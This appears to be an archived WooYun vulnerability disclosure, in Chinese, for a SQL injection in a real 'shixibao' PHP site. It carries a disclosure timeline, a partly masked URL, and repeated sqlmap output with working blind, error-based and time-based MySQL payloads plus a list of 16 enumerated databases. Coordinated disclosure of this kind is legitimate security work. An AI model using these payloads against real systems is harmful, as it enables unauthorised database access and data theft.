乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-07: 细节已通知厂商并且等待厂商处理中 2015-10-12: 厂商已经确认,细节仅向厂商公开 2015-10-22: 细节向核心白帽子及相关领域专家公开 2015-11-01: 细节向普通白帽子公开 2015-11-11: 细节向实习白帽子公开 2015-11-26: 细节向公众公开
http://**.**.**.**/shixibao/e/extend/result.php?id=7538%200%200%20-%20-
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=-4718 OR 6572=6572# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: id=-1278 OR 1 GROUP BY CONCAT(0x7162767a71,(SELECT (CASE WHEN (1209=1209) THEN 1 ELSE 0 END)),0x717a627171,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: id=(SELECT (CASE WHEN (3105=3105) THEN SLEEP(5) ELSE 3105*(SELECT 3105 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))---web server operating system: Windowsweb application technology: PHP 5.5.11, Apache 2.4.9back-end DBMS: MySQL 5.0.12current database: 'shixibao'sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=-4718 OR 6572=6572# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: id=-1278 OR 1 GROUP BY CONCAT(0x7162767a71,(SELECT (CASE WHEN (1209=1209) THEN 1 ELSE 0 END)),0x717a627171,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: id=(SELECT (CASE WHEN (3105=3105) THEN SLEEP(5) ELSE 3105*(SELECT 3105 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))---web server operating system: Windowsweb application technology: PHP 5.5.11, Apache 2.4.9back-end DBMS: MySQL 5.0.12available databases [16]:[*] cdcol[*] cem_db[*] game[*] information_schema[*] mysql[*] performance_schema[*] phpmyadmin[*] shixibao[*] shixibao_uc[*] shixibao_uchome[*] shixibao_uchome_20140525[*] test[*] testmql[*] ultrax[*] webauth[*] zhiweibeifen
参数过滤
危害等级:中
漏洞Rank:9
确认时间:2015-10-12 16:35
CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置。
暂无